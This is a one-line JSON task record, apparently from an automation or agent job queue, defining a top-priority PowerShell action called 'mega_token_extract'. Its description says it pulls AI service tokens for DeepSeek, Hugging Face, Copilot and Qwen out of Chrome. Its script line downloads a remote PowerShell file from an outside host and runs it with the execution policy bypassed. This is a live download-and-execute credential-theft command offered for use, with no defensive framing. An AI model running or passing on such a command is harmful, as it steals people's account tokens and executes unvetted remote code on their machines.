1 line
374 B
JSON
1 line
374 B
JSON
{"type": "powershell", "priority": "P0", "action": "mega_token_extract", "description": "Extract ALL AI tokens from Chrome (DeepSeek+HF+Copilot+Qwen)", "script": "Invoke-WebRequest -Uri https://weval-consulting.com/api/blade-scripts/mega-token-extract.ps1 -OutFile C:/temp/mega.ps1 -UseBasicParsing; powershell -ExecutionPolicy Bypass -File C:/temp/mega.ps1", "timeout": 90} |